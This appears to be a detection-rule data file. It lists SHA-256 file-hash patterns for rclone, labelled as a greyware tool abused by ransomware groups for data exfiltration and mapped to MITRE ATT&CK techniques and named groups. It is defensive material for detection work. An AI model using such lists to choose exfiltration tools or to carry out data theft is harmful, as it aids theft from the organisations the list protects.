"*0f4a2777e75f93aae097b180bc701ebd3d646bc0870e35c57a6b1ff26e93c16d*",".{0,1000}0f4a2777e75f93aae097b180bc701ebd3d646bc0870e35c57a6b1ff26e93c16d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0f620bc9e35e86b8a8ba5ce522f2ff3093f825b8d96057b7c54e52f9241002c7*",".{0,1000}0f620bc9e35e86b8a8ba5ce522f2ff3093f825b8d96057b7c54e52f9241002c7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0f81061930562b42e7e7a4d62075cf9a72fd34e174a819cf04f115ee238abb10*",".{0,1000}0f81061930562b42e7e7a4d62075cf9a72fd34e174a819cf04f115ee238abb10.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0f9b9069dc8cd735cf928fd5ddb184602fadd5bd033a52cb089102eed6ad11fe*",".{0,1000}0f9b9069dc8cd735cf928fd5ddb184602fadd5bd033a52cb089102eed6ad11fe.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0fe453cd91e364eeb456c71a42ab778a4271aa7791ef40be4e5de05452acf5b6*",".{0,1000}0fe453cd91e364eeb456c71a42ab778a4271aa7791ef40be4e5de05452acf5b6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0fe72859862cb5963a34b413d7b73fe370cb77f72ca673146ce56c21bae25be1*",".{0,1000}0fe72859862cb5963a34b413d7b73fe370cb77f72ca673146ce56c21bae25be1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*105f91daac5c39d8c5b89bb267423d7597733bb48492ff97d2d2099a48853184*",".{0,1000}105f91daac5c39d8c5b89bb267423d7597733bb48492ff97d2d2099a48853184.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*10b33c026f0c5ae6c12196b492174463be574733e66c68e952e30512739659a8*",".{0,1000}10b33c026f0c5ae6c12196b492174463be574733e66c68e952e30512739659a8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*10c668ffc2f613fc32e20b2ecb7fcf7f2fe26e7cbfdd8882daa3387819a1f83b*",".{0,1000}10c668ffc2f613fc32e20b2ecb7fcf7f2fe26e7cbfdd8882daa3387819a1f83b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*11371b2437f1da7425cc3a902c748eb52b799251c1100560fa96544f05a2ba02*",".{0,1000}11371b2437f1da7425cc3a902c748eb52b799251c1100560fa96544f05a2ba02.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*117b99441024607d6043e274c7fcbed64d07ad87347d17dd0a717bdc1c59716b*",".{0,1000}117b99441024607d6043e274c7fcbed64d07ad87347d17dd0a717bdc1c59716b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*117f100788386f0206029be0e673750057f28fa0b3a36f5c56e12398e68b999d*",".{0,1000}117f100788386f0206029be0e673750057f28fa0b3a36f5c56e12398e68b999d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*11bf38a2bdb74cf7c4a2309e0b7ae8da28b7821899dae8fd3cf3cca8b2894798*",".{0,1000}11bf38a2bdb74cf7c4a2309e0b7ae8da28b7821899dae8fd3cf3cca8b2894798.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*11f4b926e60a9000a88173e03113b7ddc3e483d0b49eef4ecd3643fc374d9e02*",".{0,1000}11f4b926e60a9000a88173e03113b7ddc3e483d0b49eef4ecd3643fc374d9e02.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*129d330d0ea1eb53e6959402edab063c51f751e01ae6cc4fd393f1a3b935707e*",".{0,1000}129d330d0ea1eb53e6959402edab063c51f751e01ae6cc4fd393f1a3b935707e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*12c0c757025ddf299749414fd1bd94b49efe4d38993216cd3b315bffb66618ff*",".{0,1000}12c0c757025ddf299749414fd1bd94b49efe4d38993216cd3b315bffb66618ff.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*12dfd415b34bf14102ed74b792e72b38339a504327a72b598369983da3703b54*",".{0,1000}12dfd415b34bf14102ed74b792e72b38339a504327a72b598369983da3703b54.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1305c913ac3684d02ce2bade0a23a2115c1ec03c9447d1562bb6cd9fa2573412*",".{0,1000}1305c913ac3684d02ce2bade0a23a2115c1ec03c9447d1562bb6cd9fa2573412.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1350db767085df3a6e2a907be36a0940d16c25f8c6ac8bd64ff745de479a184b*",".{0,1000}1350db767085df3a6e2a907be36a0940d16c25f8c6ac8bd64ff745de479a184b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*135a4a0965cb58eafb07941f2013a82282c44c28fea9595587778e969d9ed035*",".{0,1000}135a4a0965cb58eafb07941f2013a82282c44c28fea9595587778e969d9ed035.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1394d11f5a08542c3c47154553889be9562e080169c621f94be73318bdbe7a91*",".{0,1000}1394d11f5a08542c3c47154553889be9562e080169c621f94be73318bdbe7a91.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*13b8b9d0846722d6f86e90e60e618a4cd73351eeae67908652df3186c13c55d4*",".{0,1000}13b8b9d0846722d6f86e90e60e618a4cd73351eeae67908652df3186c13c55d4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*13de4e11ab51c7e630cb81920676b8e794c9ae2baa4b423101868a76a30aa169*",".{0,1000}13de4e11ab51c7e630cb81920676b8e794c9ae2baa4b423101868a76a30aa169.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*13e4fcf1d335db1bc87cc27d18d7eb8dabff3d7dae643313873c3cf667684241*",".{0,1000}13e4fcf1d335db1bc87cc27d18d7eb8dabff3d7dae643313873c3cf667684241.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*13ffdd811a70e1474270b90a0368534c97e2eb01b5039f4e53d2ca942c34be10*",".{0,1000}13ffdd811a70e1474270b90a0368534c97e2eb01b5039f4e53d2ca942c34be10.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*145a01e3fe92a42233064c7592d0df8580867712707192325f483208852869cf*",".{0,1000}145a01e3fe92a42233064c7592d0df8580867712707192325f483208852869cf.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*147175a6ba1a48e6516ea2d7250b137d42d959d2b45d1f08ae9511a3259d8b6f*",".{0,1000}147175a6ba1a48e6516ea2d7250b137d42d959d2b45d1f08ae9511a3259d8b6f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*147ab64f6c235bdd044d2d50c1867778ff961c4e7d9041683dd6ee4f7641121b*",".{0,1000}147ab64f6c235bdd044d2d50c1867778ff961c4e7d9041683dd6ee4f7641121b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*14c0b30920226f407724fd3461be0d1988d7df86c453b3bc982fdbec16ac91ab*",".{0,1000}14c0b30920226f407724fd3461be0d1988d7df86c453b3bc982fdbec16ac91ab.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*14c15801f53f57f5fa279950adace42b8b8bed4c4f2d790d1e73bb71659a9de9*",".{0,1000}14c15801f53f57f5fa279950adace42b8b8bed4c4f2d790d1e73bb71659a9de9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*14e2341ca927541a8d4bc545766f9bb8e1f7b79c15f1ea83836572e82b658c13*",".{0,1000}14e2341ca927541a8d4bc545766f9bb8e1f7b79c15f1ea83836572e82b658c13.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1508bf7cb951181238f77370466220239404cd475472081c8059eb3d74e668cb*",".{0,1000}1508bf7cb951181238f77370466220239404cd475472081c8059eb3d74e668cb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1526e61423a885f9c11c2479c287caddebaed466e4b08fccd9d1ac13b7be775e*",".{0,1000}1526e61423a885f9c11c2479c287caddebaed466e4b08fccd9d1ac13b7be775e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1580dc09833da345f0ae3c8c3fc9da782628f8f6abf06062f9ce0af13e04c27a*",".{0,1000}1580dc09833da345f0ae3c8c3fc9da782628f8f6abf06062f9ce0af13e04c27a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1596547091d637278d0801f6ac2a625fa18bce9e74a5b3233b3ffb62357f3af0*",".{0,1000}1596547091d637278d0801f6ac2a625fa18bce9e74a5b3233b3ffb62357f3af0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*15bf47f400527b9a4a31edaa121e6111ea6a1dffe68eb83800c6f73074f298bf*",".{0,1000}15bf47f400527b9a4a31edaa121e6111ea6a1dffe68eb83800c6f73074f298bf.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*15f45c7dbae6b09ca503e3c029527d8895f2c8f36501de4975e9c1e1016982f9*",".{0,1000}15f45c7dbae6b09ca503e3c029527d8895f2c8f36501de4975e9c1e1016982f9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
